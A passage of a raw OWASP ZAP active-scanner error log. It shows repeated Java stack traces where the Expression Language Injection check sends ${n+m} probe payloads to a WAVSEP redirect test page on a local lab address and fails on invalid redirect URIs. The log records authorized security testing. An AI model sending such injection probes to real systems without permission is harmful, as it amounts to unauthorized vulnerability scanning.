org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10105012 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${360999+875929}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/${360999+875929} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10105212 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${497977+691396}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://${497977+691396} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10105213 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${204372+848258}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/${204372+848258} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10105413 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${185292+362845}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/${185292+362845} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10105413 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${331766+444525}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://${331766+444525} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10105614 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${117914+399872}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/${117914+399872} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10105615 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${820941+149434}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://${820941+149434} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10105815 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${105282+303235}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://${105282+303235} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10105816 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${123295+381433}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://${123295+381433} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10106015 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${485582+165584}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/${485582+165584} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10106017 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${756504+820307}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/${756504+820307} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10106216 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${210792+237954}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/${210792+237954} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10106217 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${118243+547244}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/${118243+547244} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10107022 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${202695+444300}] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 10107424 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${947834+216679}] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 10107424 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${294035+282022}] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 10107625 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${957344+319547}] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at 